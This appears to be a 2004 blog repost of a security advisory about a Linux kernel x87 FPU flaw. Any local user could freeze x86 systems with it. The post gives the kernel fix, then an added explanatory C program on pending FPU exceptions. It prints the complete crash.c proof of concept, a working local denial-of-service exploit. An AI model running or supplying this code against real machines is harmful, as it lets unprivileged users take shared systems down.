June 17, 2004

New Kernel Crash-Exploit discovered

This is probably the most serious problem in the history of the Linux kernel; almost every version has the flaw.
I tried it on a Mandrake 9.2 machine, running the crash-kernel program with ordinary user privileges, and it
took effect immediately.
Fix
In include/asm-i386/i387.h, change
asm volatile("fwait"); \
to
asm volatile("fnclex ; fwait"); \

The new 2.6.7 already has this problem fixed.

http://linuxreviews.org/news/2004-06-11_kernel_crash/index.html

Published 2004-06-11 by xiando, v2.2.4, last updated 2004-06-15.

A bug lets a simple C program crash the Linux kernel, effectively
locking the whole system. Affects both 2.4.2x and 2.6.x kernels
on the x86 architecture.

The kernel is the most important part of the Linux operating system.
It handles communication with the computer's hardware and decides
the priority of running programs (processes). If the kernel stops
doing its job, everything else will too.

※ The Evil Code

Running this simple C program crashes the Linux kernel.

crash.c.txt
http://linuxreviews.org/news/2004-06-11_kernel_crash/crash.c.txt

  #include <signal.h>
  #include <sys/time.h>
  #include <unistd.h>

  /* SIGALRM handler: save the x87 state, do a little work, restore it.
     The fsave/frstor pair around a system call is what exposes the bug. */
  static void Handler(int ignore)
  {
      char fpubuf[108];                 /* size of a 32-bit fsave image */
      __asm__ __volatile__ ("fsave %0\n" : "=m"(fpubuf));
      write(2, "*", 1);
      __asm__ __volatile__ ("frstor %0\n" : : "m"(fpubuf));
  }

  int main(int argc, char *argv[])
  {
      struct itimerval spec;
      signal(SIGALRM, Handler);
      /* deliver SIGALRM every 100 microseconds, starting 100 us from now */
      spec.it_interval.tv_sec = 0;
      spec.it_interval.tv_usec = 100;
      spec.it_value.tv_sec = 0;
      spec.it_value.tv_usec = 100;
      setitimer(ITIMER_REAL, &spec, NULL);
      while (1)                         /* stay busy in system calls */
          write(1, ".", 1);

      return 0;
  }


This bug is confirmed to be present when the code is compiled with
GCC version 2.96, 3.0, 3.1, 3.2, 3.3 and 3.3.2 and used on Linux
kernel versions 2.4.2x and 2.6.x on x86 and amd64 systems.
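The following program is an added illustration, not code from the linuxreviews article or from pank's post, of the state behind the one-word fix above: an x87 exception that is raised but unmasked stays pending until the next waiting instruction, so a kernel executing a bare fwait on behalf of a process that restored such state faults in kernel mode, and fnclex (a no-wait instruction) clears the pending flags first. The bit positions used are the x87 control and status word layout and the fsave image layout (control word at byte 0, status word at byte 4); the sample image is constructed here rather than captured, and the function names are this example's own. On x86 it also reproduces the condition on the live FPU, using the no-wait fnstsw and fninit so nothing ever waits on the pending exception.

```c
/* Added example: pending, unmasked x87 exceptions, and what fnclex clears.
 * Bit layout below is the x87 status/control word; the sample fsave image
 * is constructed, not captured from a real run. */
#include <stdio.h>
#include <string.h>

#define FSAVE_IMAGE_SIZE 108     /* 32-bit fsave/frstor area, as in crash.c */
#define SW_IE  0x0001            /* status word: invalid-operation flag     */
#define SW_ES  0x0080            /* status word: error summary (unmasked)   */
#define CW_IM  0x0001            /* control word: invalid-operation mask    */
#define CW_DEFAULT 0x037f        /* all six exceptions masked               */

static unsigned short rd16(const unsigned char *p)
{
    return (unsigned short)(p[0] | (p[1] << 8));
}
static void wr16(unsigned char *p, unsigned v)
{
    p[0] = v & 0xff;
    p[1] = (v >> 8) & 0xff;
}

/* Exception flags that are raised in the image's status word (offset 4) and
 * unmasked in its control word (offset 0). Non-zero means: after frstor of
 * this image, the next waiting x87 instruction, fwait included, faults. */
unsigned fsave_pending_unmasked(const unsigned char img[FSAVE_IMAGE_SIZE])
{
    unsigned cw = rd16(img + 0), sw = rd16(img + 4);
    return sw & ~cw & 0x3f;
}

/* Effect of fnclex on the status word: clears the six exception flags, the
 * stack-fault flag, ES and B (bits 0..7 and 15). */
void fnclex_image(unsigned char img[FSAVE_IMAGE_SIZE])
{
    wr16(img + 4, rd16(img + 4) & ~0x80ffu);
}

/* Constructed sample image: invalid-operation unmasked in the control word,
 * IE and ES set in the status word. Returns the pending-unmasked set before
 * (apply_fnclex == 0) or after (apply_fnclex != 0) the fix's fnclex. */
unsigned poisoned_image_pending(int apply_fnclex)
{
    unsigned char img[FSAVE_IMAGE_SIZE];
    memset(img, 0, sizeof img);
    wr16(img + 0, CW_DEFAULT & ~CW_IM);
    wr16(img + 4, SW_IE | SW_ES);
    wr16(img + 8, 0xffff);            /* tag word: all registers empty */
    if (apply_fnclex)
        fnclex_image(img);
    return fsave_pending_unmasked(img);
}

#if defined(__i386__) || defined(__x86_64__)
/* Live FPU: unmask everything, compute 0.0/0.0 so an invalid-operation
 * exception is left pending, read the status word with the no-wait fnstsw,
 * then clear it with the no-wait fninit before anything can wait on it.
 * Returns the status word observed while the exception was pending. */
int probe_pending_x87(void)
{
    unsigned short status = 0, saved_cw = 0;
    const unsigned short unmask_all = 0x0340;   /* all mask bits clear */
    __asm__ __volatile__(
        "fnstcw %[cw]\n\t"
        "fnclex\n\t"
        "fldcw %[ucw]\n\t"
        "fldz\n\t"
        "fldz\n\t"
        "fdivp\n\t"
        "fnstsw %[sw]\n\t"
        "fninit\n\t"
        "fldcw %[cw]\n\t"
        : [sw] "=m"(status), [cw] "+m"(saved_cw)
        : [ucw] "m"(unmask_all)
        : "cc", "st", "st(1)", "st(2)", "st(3)", "st(4)", "st(5)", "st(6)", "st(7)");
    return status;
}
#else
int probe_pending_x87(void) { return -1; }   /* no x87 on this machine */
#endif

int main(void)
{
    int sw = probe_pending_x87();
    printf("image: pending unmasked before fnclex=%#x, after=%#x\n",
           poisoned_image_pending(0), poisoned_image_pending(1));
    if (sw < 0)
        printf("live x87 probe skipped on this architecture\n");
    else
        printf("live x87: status word %#06x (IE=%d ES=%d) while 0/0 was pending\n",
               sw, !!(sw & SW_IE), !!(sw & SW_ES));
    return 0;
}
```

The live probe never executes a waiting instruction between the division and fninit, which is the same discipline the fix imposes on the kernel: clear with fnclex before fwait. Replacing fninit with a plain fwait in the asm block would deliver SIGFPE to this process instead, which is exactly the trap the unpatched kernel took in kernel mode.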

Posted by pank at June 17, 2004 03:39 PM